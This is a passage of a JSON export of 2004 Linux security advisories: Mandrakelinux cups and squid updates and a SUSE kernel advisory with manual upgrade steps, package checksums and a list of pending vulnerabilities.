72375896902c44ee2d5d3b3297ff8909 x86_64/corporate/2.1/RPMS/libcups1-1.1.18-2.5.C21mdk.x86_64.rpm\r\n 58dd73863448021e52fbd9bf2536e4c1 x86_64/corporate/2.1/RPMS/libcups1-devel-1.1.18-2.5.C21mdk.x86_64.rpm\r\n 39b6eb02f3df6a8ac7b6ec1d9a0642a4 x86_64/corporate/2.1/SRPMS/cups-1.1.18-2.5.C21mdk.src.rpm\r\n\r\n Mandrakelinux 9.2:\r\n 73897a45c5474c390adc09c32c52073e 9.2/RPMS/cups-1.1.19-10.3.92mdk.i586.rpm\r\n 35ab026be5795ef537d996dd50b3ec59 9.2/RPMS/cups-common-1.1.19-10.3.92mdk.i586.rpm\r\n 34bd630f0656b7eefa331001ebe46d07 9.2/RPMS/cups-serial-1.1.19-10.3.92mdk.i586.rpm\r\n dd362e1edc0774593cbb564d2fcedffb 9.2/RPMS/libcups2-1.1.19-10.3.92mdk.i586.rpm\r\n 04119307b9e5e37f36f502f3e299880c 9.2/RPMS/libcups2-devel-1.1.19-10.3.92mdk.i586.rpm\r\n 264f7c4310ff0c0bf1166374d49f5ea3 9.2/SRPMS/cups-1.1.19-10.3.92mdk.src.rpm\r\n\r\n Mandrakelinux 9.2/AMD64:\r\n a5a6317fc35c0c7ec51da2074ea59cdb amd64/9.2/RPMS/cups-1.1.19-10.3.92mdk.amd64.rpm\r\n 2de8b565958236a4cf299967187aaad1 amd64/9.2/RPMS/cups-common-1.1.19-10.3.92mdk.amd64.rpm\r\n 944995579621ce5a986459a47924370c amd64/9.2/RPMS/cups-serial-1.1.19-10.3.92mdk.amd64.rpm\r\n 82c5aed6ab6c81a8fab48b0bd2997eb7 amd64/9.2/RPMS/lib64cups2-1.1.19-10.3.92mdk.amd64.rpm\r\n 0b99ed51e2b24aac0747334044a5730e amd64/9.2/RPMS/lib64cups2-devel-1.1.19-10.3.92mdk.amd64.rpm\r\n 264f7c4310ff0c0bf1166374d49f5ea3 amd64/9.2/SRPMS/cups-1.1.19-10.3.92mdk.src.rpm\r\n\r\n Multi Network Firewall 8.2:\r\n 8bfd1913756558cac4e58e7e22f2d67f mnf8.2/RPMS/libcups1-1.1.18-2.3.M82mdk.i586.rpm\r\n a47dcb23ef45908945eff6977b4387e2 mnf8.2/SRPMS/cups-1.1.18-2.3.M82mdk.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrakeUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandrakesoft for security. You can obtain\r\n the GPG public key of the Mandrakelinux Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandrakelinux at:\r\n\r\n http://www.mandrakesoft.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_linux-mandrake.com\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team\r\n <security linux-mandrake.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.7 (GNU/Linux)\r\n\r\niD8DBQFBeHhtmqjQ0CJFipgRApe4AJ49l+Mk3uhuHR/dc9bADAIOOpht2gCg5U26\r\nxs17BzSOHPyi+u4v7h5ciq8=\r\n=kGLV\r\n-----END PGP SIGNATURE-----", "modified": "2004-10-22T00:00:00", "published": "2004-10-22T00:00:00", "id": "SECURITYVULNS:DOC:7054", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7054", "title": "MDKSA-2004:116 - Updated cups packages fix DoS vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandrakelinux Security Update Advisory\r\n _______________________________________________________________________\r\n\r\n Package name: squid\r\n Advisory ID: MDKSA-2004:093\r\n Date: September 15th, 2004\r\n\r\n Affected versions: 10.0, 9.2\r\n ______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A vulnerability in the NTLM helpers in squid 2.5 could allow for\r\n malformed NTLMSSP packets to crash squid, resulting in a DoS. The\r\n provided packages have been patched to prevent this problem.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0832\r\n http://www.squid-cache.org/bugs/show_bug.cgi?id=1045\r\n ______________________________________________________________________\r\n\r\n Updated Packages:\r\n \r\n Mandrakelinux 10.0:\r\n a97e24902f95afb896e1387124be81cd 10.0/RPMS/squid-2.5.STABLE4-2.1.100mdk.i586.rpm\r\n 92bc96caf7e5ccaed6250833b8c4dcdc 10.0/SRPMS/squid-2.5.STABLE4-2.1.100mdk.src.rpm\r\n\r\n Mandrakelinux 10.0/AMD64:\r\n 48a9ee3a6e7b427240fc35a04b569b06 amd64/10.0/RPMS/squid-2.5.STABLE4-2.1.100mdk.amd64.rpm\r\n 92bc96caf7e5ccaed6250833b8c4dcdc amd64/10.0/SRPMS/squid-2.5.STABLE4-2.1.100mdk.src.rpm\r\n\r\n Mandrakelinux 9.2:\r\n ad5b562c41b764f1807bcfa4203b7f22 9.2/RPMS/squid-2.5.STABLE3-3.3.92mdk.i586.rpm\r\n 72d8e8215f7da363d28883f4a4a6d13b 9.2/SRPMS/squid-2.5.STABLE3-3.3.92mdk.src.rpm\r\n\r\n Mandrakelinux 9.2/AMD64:\r\n ef8de99bad97ad623f584fcf4eaa3962 amd64/9.2/RPMS/squid-2.5.STABLE3-3.3.92mdk.amd64.rpm\r\n 72d8e8215f7da363d28883f4a4a6d13b amd64/9.2/SRPMS/squid-2.5.STABLE3-3.3.92mdk.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrakeUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandrakesoft for security. You can obtain\r\n the GPG public key of the Mandrakelinux Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandrakelinux at:\r\n\r\n http://www.mandrakesoft.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_linux-mandrake.com\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team\r\n <security linux-mandrake.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.0.7 (GNU/Linux)\r\n\r\niD8DBQFBSGl7mqjQ0CJFipgRAibKAKDBC0+fK87wqk6pis/dwh0BRn56aQCg8dtp\r\nHHfI6/5bMJiniFIWqQ04nYM=\r\n=UN2/\r\n-----END PGP SIGNATURE-----", "modified": "2004-09-16T00:00:00", "published": "2004-09-16T00:00:00", "id": "SECURITYVULNS:DOC:6816", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6816", "title": "MDKSA-2004:093 - Updated squid packages fix DoS vulnerability", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:10", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\n\r\n______________________________________________________________________________\r\n\r\n SUSE Security Announcement\r\n\r\n Package: kernel\r\n Announcement-ID: SUSE-SA:2004:020\r\n Date: Tuesday, Jul 2nd 2004 18:00 MEST\r\n Affected products: 8.0, 8.1, 8.2, 9.0, 9.1\r\n SUSE Linux Database Server,\r\n SUSE eMail Server III, 3.1\r\n SUSE Linux Enterprise Server 7, 8\r\n SUSE Linux Firewall on CD/Admin host\r\n SUSE Linux Connectivity Server\r\n SUSE Linux Office Server\r\n Vulnerability Type: local privilege escalation\r\n Severity (1-10): 6\r\n SUSE default package: yes\r\n Cross References: CAN-2004-0495\r\n CAN-2004-0496\r\n CAN-2004-0497\r\n CAN-2004-0535\r\n CAN-2004-0626\r\n\r\n\r\n Content of this advisory:\r\n 1) security vulnerability resolved:\r\n - chown: users can change the group affiliation of arbitrary\r\n files to the group they belong to\r\n - missing DAC check in chown(2): local privilege escalation\r\n - overflow with signals: local denial-of-service\r\n - pss, mpu401 sound driver: read/write to complete memory\r\n - airo driver: read/write to complete memory\r\n - ALSA: copy_from_user/copy_to_user confused\r\n - acpi_asus: read from random memory\r\n - decnet: write to memory without checking\r\n - e1000 driver: read complete memory\r\n problem description, discussion, solution and upgrade information\r\n 2) pending vulnerabilities, solutions, workarounds:\r\n - icecast\r\n - sitecopy\r\n - cadaver\r\n - OpenOffice_org\r\n - tripwire\r\n - postgresql*\r\n - mod_proxy\r\n - freeswan\r\n - ipsec-tools\r\n - less\r\n - libpng\r\n - pavuk\r\n - XFree86*\r\n - kdebase3\r\n 3) standard appendix (further information)\r\n\r\n______________________________________________________________________________\r\n\r\n1) problem description, brief discussion, solution, upgrade information\r\n\r\n Multiple security vulnerabilities are being addressed with this security\r\n update of the Linux kernel.\r\n\r\n Kernel memory access vulnerabilities are fixed in the e1000, decnet, \r\n acpi_asus, alsa, airo/WLAN, pss and mpu401 drivers. These \r\n vulnerabilities can lead to kernel memory read access, write access \r\n and local denial of service conditions, resulting in access to the \r\n root account for an attacker with a local account on the affected \r\n system.\r\n\r\n Missing Discretionary Access Control (DAC) checks in the chown(2) system\r\n call allow an attacker with a local account to change the group\r\n ownership of arbitrary files, which leads to root privileges on affected\r\n systems. It is specific to kernel version 2.6 based systems such as \r\n the SUSE Linux 9.1 product, that only local shell access is needed to \r\n exploit this vulnerability. An interesting variant of the missing \r\n checks is that the ownership of files in the /proc filesystem can be \r\n altered, while the changed ownership still does not allow the files to \r\n be accessed as a non-root user for to be able to exploit the \r\n vulnerability. Systems that are based on a version 2.4 kernel are not \r\n vulnerable to the /proc weakness, and exploitation of the weakness \r\n requires the use of the kernel NFS server (knfsd). If the knfsd NFS \r\n server is not activated (it is off by default), the vulnerability is \r\n not exposed. These issues related to the chown(2) system call have been \r\n discovered by Michael Schroeder and Ruediger Oertel, both SUSE LINUX.\r\n\r\n The only network-related vulnerability fixed with the kernel updates\r\n that are subject to this announcement affect the SUSE Linux 9.1 \r\n distribution only, as it is based on a 2.6 kernel. Found and reported \r\n to bugtraq by Adam Osuchowski and Tomasz Dubinski, the vulnerability \r\n allows a remote attacker to send a specially crafted TCP packet to a \r\n vulnerable system, causing that system to stall if it makes use of \r\n TCP option matching netfilter rules.\r\n\r\n In some rare configurations of the SUSE Linux 9.1 distribution, some \r\n users have experienced stalling systems during system startup. These \r\n problems are fixed with this kernel update.\r\n\r\n\r\n\r\n SPECIAL INSTALL INSTRUCTIONS:\r\n ==============================\r\n For the impatient: Run YOU (Yast2 Online Update, command \r\n "yast2 online_update" as root) to install the updates (semi) \r\n automatically, if you have a SUSE Linux 8.1 and newer system.\r\n\r\n For those who wish to install their kernel updates manually and for \r\n those who use a SUSE Linux 8.0 system:\r\n\r\n The following paragraphs will guide you through the installation\r\n process in a step-by-step fashion. The character sequence "****"\r\n marks the beginning of a new paragraph. In some cases, the steps\r\n outlined in a particular paragraph may or may not be applicable\r\n to your situation.\r\n Therefore, please make sure to read through all of the steps below\r\n before attempting any of these procedures.\r\n All of the commands that need to be executed are required to be\r\n run as the superuser (root). Each step relies on the steps before\r\n it to complete successfully.\r\n\r\n\r\n **** Step 1: Determine the needed kernel type\r\n\r\n Please use the following command to find the kernel type that is\r\n installed on your system:\r\n\r\n rpm -qf /boot/vmlinuz\r\n\r\n Following are the possible kernel types (disregard the version and\r\n build number following the name separated by the "-" character)\r\n\r\n k_deflt # default kernel, good for most systems.\r\n k_i386 # kernel for older processors and chipsets\r\n k_athlon # kernel made specifically for AMD Athlon(tm) family processors\r\n k_psmp # kernel for Pentium-I dual processor systems\r\n k_smp # kernel for SMP systems (Pentium-II and above)\r\n k_smp4G # kernel for SMP systems which supports a maximum of 4G of RAM\r\n kernel-64k-pagesize\r\n kernel-bigsmp\r\n kernel-default\r\n kernel-smp\r\n\r\n **** Step 2: Download the package for your system\r\n\r\n Please download the kernel RPM package for your distribution with the\r\n name as indicated by Step 1. The list of all kernel rpm packages is\r\n appended below. Note: The kernel-source package does not\r\n contain a binary kernel in bootable form. Instead, it contains the\r\n sources that the binary kernel rpm packages are created from. It can be\r\n used by administrators who have decided to build their own kernel.\r\n Since the kernel-source.rpm is an installable (compiled) package that\r\n contains sources for the linux kernel, it is not the source RPM for\r\n the kernel RPM binary packages.\r\n\r\n The kernel RPM binary packages for the distributions can be found at the\r\n locations below ftp://ftp.suse.com/pub/suse/i386/update/.\r\n\r\n 8.0/images/\r\n 8.1/rpm/i586\r\n 8.2/rpm/i586\r\n 9.0/rpm/i586\r\n 9.1/rpm/i586\r\n\r\n After downloading the kernel RPM package for your system, you should\r\n verify the authenticity of the kernel rpm package using the methods as\r\n listed in section 3) of each SUSE Security Announcement.\r\n\r\n\r\n **** Step 3: Installing your kernel rpm package\r\n\r\n Install the rpm package that you have downloaded in Steps 3 or 4 with\r\n the command\r\n rpm -Uhv --nodeps --force <K_FILE.RPM>\r\n where <K_FILE.RPM> is the name of the rpm package that you downloaded.\r\n\r\n Warning: After performing this step, your system will likely not be\r\n able to boot if the following steps have not been fully\r\n followed.\r\n\r\n\r\n If you run SUSE LINUX 8.1 and haven't applied the kernel update\r\n (SUSE-SA:2003:034), AND you are using the freeswan package, you also\r\n need to update the freeswan rpm as a dependency as offered\r\n by YOU (YaST Online Update). The package can be downloaded from\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/\r\n\r\n **** Step 4: configuring and creating the initrd\r\n\r\n The initrd is a ramdisk that is loaded into the memory of your\r\n system together with the kernel boot image by the bootloader. The\r\n kernel uses the content of this ramdisk to execute commands that must\r\n be run before the kernel can mount its actual root filesystem. It is\r\n usually used to initialize SCSI drivers or NIC drivers for diskless\r\n operation.\r\n\r\n The variable INITRD_MODULES in /etc/sysconfig/kernel determines\r\n which kernel modules will be loaded in the initrd before the kernel\r\n has mounted its actual root filesystem. The variable should contain\r\n your SCSI adapter (if any) or filesystem driver modules.\r\n\r\n With the installation of the new kernel, the initrd has to be\r\n re-packed with the update kernel modules. Please run the command\r\n\r\n mk_initrd\r\n\r\n as root to create a new init ramdisk (initrd) for your system.\r\n On SuSE Linux 8.1 and later, this is done automatically when the\r\n RPM is installed.\r\n\r\n\r\n **** Step 5: bootloader\r\n\r\n If you run a SUSE LINUX 8.x, SLES8, or SUSE LINUX 9.x system, there\r\n are two options:\r\n Depending on your software configuration, you have either the lilo\r\n bootloader or the grub bootloader installed and initialized on your\r\n system.\r\n The grub bootloader does not require any further actions to be\r\n performed after the new kernel images have been moved in place by the\r\n rpm Update command.\r\n If you have a lilo bootloader installed and initialized, then the lilo\r\n program must be run as root. Use the command\r\n\r\n grep LOADER_TYPE /etc/sysconfig/bootloader\r\n\r\n to find out which boot loader is configured. If it is lilo, then you\r\n must run the lilo command as root. If grub is listed, then your system\r\n does not require any bootloader initialization.\r\n\r\n Warning: An improperly installed bootloader may render your system\r\n unbootable.\r\n\r\n **** Step 6: reboot\r\n\r\n If all of the steps above have been successfully completed on your\r\n system, then the new kernel including the kernel modules and the\r\n initrd should be ready to boot. The system needs to be rebooted for\r\n the changes to become active. Please make sure that all steps have\r\n completed, then reboot using the command\r\n shutdown -r now\r\n or\r\n init 6\r\n\r\n Your system should now shut down and reboot with the new kernel.\r\n\r\n\r\n There is no workaround known.\r\n\r\n\r\n Please download the update package for your distribution and verify its\r\n integrity by the methods listed in section 3) of this announcement.\r\n Then, install the package using the command "rpm -Fhv file.rpm" to apply\r\n the update.\r\n Our maintenance customers are being notified individually. The packages\r\n are being offered to install from the maintenance web.\r\n\r\n\r\n\r\n\r\n\r\n x86 Platform:\r\n\r\n SUSE Linux 9.1:\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-default-2.6.5-7.95.i586.rpm\r\n 800418d3dddf6d3b83925f562842205a\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-smp-2.6.5-7.95.i586.rpm\r\n 0cb990b159e10685bb29b76d312ddd25\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5-7.95.i586.rpm\r\n 7446bb70f52bce57a914066be4ed8e45\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5-7.95.i586.rpm\r\n 7446bb70f52bce57a914066be4ed8e45\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-source-2.6.5-7.95.i586.rpm\r\n ede031495ee19d8b6eca1873e7155332\r\n source rpm(s):\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-default-2.6.5-7.95.nosrc.rpm\r\n 620ef40226fec31a773397cf3051bf36\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-smp-2.6.5-7.95.nosrc.rpm\r\n 9b61b5a70b304f5554cb18a6bae5b5fd\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-bigsmp-2.6.5-7.95.nosrc.rpm\r\n 227c85280ee17a66c8590fe1bb14c596\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-source-2.6.5-7.95.src.rpm\r\n 895fee3033de0810ff1173ce8ee87936\r\n\r\n SUSE Linux 9.0:\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_deflt-2.4.21-231.i586.rpm\r\n 48be395b96329909486ae3a5152348fa\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_athlon-2.4.21-231.i586.rpm\r\n 4cd322b4f511d5fe4c483ed28a82097e\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp-2.4.21-231.i586.rpm\r\n 262e33cebf1b0d35fb6d3235c9ab8815\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_smp4G-2.4.21-231.i586.rpm\r\n 8d81370f90736b12aa71b9c744f6e0e2\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/k_um-2.4.21-231.i586.rpm\r\n bc59c838c84ba318dc4d24da08a3022e\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/kernel-source-2.4.21-231.i586.rpm\r\n f9586ba982e0398c3e48871955b661aa\r\n source rpm(s):\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_deflt-2.4.21-231.src.rpm\r\n 18673b0bf347fe9557d4e67ca02000c0\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_athlon-2.4.21-231.src.rpm\r\n 71496daac44196b0e0a3836ee6a3b4ed\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp-2.4.21-231.src.rpm\r\n 7c208e9e3f7be1a68c3c8457eb2cafc4\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_smp4G-2.4.21-231.src.rpm\r\n b77863c863aaf4b931bff263220e6ec9\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/k_um-2.4.21-231.src.rpm\r\n bed7e964e22c5e5d2f5e7a5e3816dde4\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/kernel-source-2.4.21-231.src.rpm\r\n 6b5137bf379fbfc861441151039575da\r\n\r\n SUSE Linux 8.2:\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_deflt-2.4.20-115.i586.rpm\r\n 50d261b44616f9145a0dc16df501a504\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_athlon-2.4.20-115.i586.rpm\r\n 10095854c0bdae20991d90b822352e14\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_smp-2.4.20-115.i586.rpm\r\n a2ef7cfb0e62ad955dda2b0574eb3150\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/k_psmp-2.4.20-115.i586.rpm\r\n 1d2b0d0e2c7998685ed04c24e593b196\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/kernel-source-2.4.20.SuSE-115.i586.rpm\r\n d8bf98c46ba5313db286d5706f7fb3b8\r\n source rpm(s):\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_deflt-2.4.20-115.src.rpm\r\n e13a7b4c2b185cfeb991c31607f79ccb\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_athlon-2.4.20-115.src.rpm\r\n 0e2f2cf20e7d7a20f3e50b245105df61\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_smp-2.4.20-115.src.rpm\r\n 6cfac2914d3827ec562ff9d6be29c566\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/k_psmp-2.4.20-115.src.rpm\r\n afd29843aa69d805ef5f25d39ecd0e7f\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/kernel-source-2.4.20.SuSE-115.src.rpm\r\n 098a1400a48404931acb8b3eb2e821fb\r\n\r\n SUSE Linux 8.1:\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_deflt-2.4.21-231.i586.rpm\r\n 3bdaa593d09a7cbff632a2c4446d5603\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_athlon-2.4.21-231.i586.rpm\r\n ba60d0b2b6d3bc9c38b4e8b3859e1586\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_smp-2.4.21-231.i586.rpm\r\n ffa8983669004826a0cbedbe34dced76\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/k_psmp-2.4.21-231.i586.rpm\r\n 25174fd007f5a39ee0342dd6f18f2eaa\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/kernel-source-2.4.21-231.i586.rpm\r\n 10837fa561cd5104e55d48e46c837764\r\n source rpm(s):\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_deflt-2.4.21-231.src.rpm\r\n c37e8b87819602e77b14206affef00fa\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_athlon-2.4.21-231.src.rpm\r\n 7be68a677db5a65be1a46ec194b35497\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_smp-2.4.21-231.src.rpm\r\n 8e4b7d5a6bb81da5a00971cdcc4ec641\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/k_psmp-2.4.21-231.src.rpm\r\n d8ba1db81a9b517f867c970e4fc443a7\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/kernel-source-2.4.21-231.src.rpm\r\n 96a0a9242d066083c7bff8e0f70b7bbe\r\n\r\n SUSE Linux 8.0:\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_deflt-2.4.18-303.i386.rpm\r\n ec1e53b3812c0c0bd3681435d69fb134\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_smp-2.4.18-303.i386.rpm\r\n 583164e52019ae090fd47e425c2a933e\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_psmp-2.4.18-303.i386.rpm\r\n 9ac8983abef05697d75f3117e37e5f18\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/images/k_i386-2.4.18-303.i386.rpm\r\n 4932c4d6a42fc9be02013f398ab5bb96\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/d3/kernel-source-2.4.18.SuSE-303.i386.rpm\r\n b9de0731f9bbc4b016455a6d52cd8296\r\n source rpm(s):\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_deflt-2.4.18-303.src.rpm\r\n a73bacad80432c26e856c41338b154bd\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_smp-2.4.18-303.src.rpm\r\n 782902cd14e7776db66bd61a12beee03\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_psmp-2.4.18-303.src.rpm\r\n d71fa5cda488ae18f8d023cd8f28bb73\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/k_i386-2.4.18-303.src.rpm\r\n a360a9e6ed2db54f69e17db36f02614f\r\n ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/kernel-source-2.4.18.SuSE-303.nosrc.rpm\r\n 8017fd6ff8a6fc1a0660ab35ad174388\r\n\r\n\r\n\r\n x86-64 Platform:\r\n\r\n SUSE Linux 9.1:\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-default-2.6.5-7.95.x86_64.rpm\r\n e2c53fd24991f739fd754c07f7aa8293\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-smp-2.6.5-7.95.x86_64.rpm\r\n f4a69622b7628cdd662a4e39aa59b60e\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-source-2.6.5-7.95.x86_64.rpm\r\n e71adfb1fc662600eb11d3acf67c3dc3\r\n source rpm(s):\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-default-2.6.5-7.95.nosrc.rpm\r\n f6a364879d1f2ae2cf854810d61be3ac\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-smp-2.6.5-7.95.nosrc.rpm\r\n a0096d1fc067d89c9200ea3904713d59\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-source-2.6.5-7.95.src.rpm\r\n bf6d0439cfc37b50b4f6822c3403a74f\r\n\r\n SUSE Linux 9.0:\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_deflt-2.4.21-231.x86_64.rpm\r\n 17e008a737e5e95e71335e34fa7f86cf\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/k_smp-2.4.21-231.x86_64.rpm\r\n ca742b550b1a503595b02cbfc9e0e481\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/x86_64/kernel-source-2.4.21-231.x86_64.rpm\r\n 8e0c16c42d1a89aa6a09be1dd575de47\r\n source rpm(s):\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_deflt-2.4.21-231.src.rpm\r\n 58b1bf42b5661119d06a04888144707a\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_smp-2.4.21-231.src.rpm\r\n 5103001136e39fca5a59f4cbde82822b\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/kernel-source-2.4.21-231.src.rpm\r\n 231c9e5e00f17df8cfd72d6c8a68d9cf\r\n\r\n\r\n______________________________________________________________________________\r\n\r\n2) Pending vulnerabilities in SUSE Distributions and Workarounds:\r\n\r\n - icecast\r\n The icecast service is vulnerable to a remote denial-of-service\r\n attack. Update packages will be available soon.\r\n\r\n - sitecopy\r\n The sitecopy package includes a vulnerable version of the\r\n neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be\r\n available soon.\r\n\r\n - cadaver\r\n The cadaver package includes a vulnerable version of the\r\n neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be\r\n available soon.\r\n\r\n - OpenOffice_org\r\n The OpenOffice_org package includes a vulnerable version\r\n of the neon library (CAN-2004-0179, CAN-2004-0398). Update packages\r\n will be available soon.\r\n\r\n - tripwire\r\n A format string bug in tripwire can be exploited locally\r\n to gain root permissions.\r\n New packages are available.\r\n\r\n - postgresql\r\n A buffer overflow in psqlODBC could be exploited to crash the\r\n application using it. E.g. a PHP script that uses ODBC to access a\r\n PostgreSQL database can be utilized to crash the surrounding Apache\r\n web-server. Other parts of PostgreSQL are not affected.\r\n New packages are available.\r\n\r\n - XDM/XFree86\r\n This update resolves random listening to ports by XDM\r\n that allows to connect via the XDMCP. SUSE LINUX 9.1\r\n is affected only.\r\n New packages are available.\r\n\r\n - mod_proxy\r\n A buffer overflow can be triggered by malicious remote\r\n servers that return a negative Content-Length value.\r\n This vulnerability can be used to execute commands remotely\r\n New packages are available.\r\n\r\n - freeswan\r\n A bug in the certificate chain authentication code could allow an\r\n attacker to authenticate any host against a FreeS/WAN server by\r\n presenting specially crafted certificates wrapped in a PKCS#7 file.\r\n The packages are currently being tested and will be available soon.\r\n\r\n - ipsec-tools\r\n The racoon daemon which is responsible for handling IKE messages\r\n fails to reject invalid or self-signed X.509 certificates which\r\n allows for man-in-the-middle attacks on IPsec tunnels established\r\n via racoon.\r\n The packages are currently being tested and will be available soon.\r\n\r\n - less\r\n This update fixes a possible symlink attack in lessopen.sh. The\r\n attack can be executed by local users to overwrite arbitrary files\r\n with the privileges of the user running less.\r\n New packages are available.\r\n\r\n - libpng\r\n This update adds a missing fix for CAN-2002-1363.\r\n New packages are available.\r\n\r\n - pavuk\r\n This update fixes a remotely exploitable buffer overflow in pavuk.\r\n Thanks to Ulf Harnhammar for reporting this to us.\r\n New packages are available.\r\n\r\n - kdebase3\r\n This update fixes a possible attack on tmp files created at the\r\n first login of a user using KDE or at the first time running a\r\n KDE application. This bug can be exploited locally to overwrite\r\n arbitrary files with the privilege of the victim user.\r\n Just affects SUSE LINUX 9.1\r\n New packages are available.\r\n\r\n______________________________________________________________________________\r\n\r\n3) standard appendix: authenticity 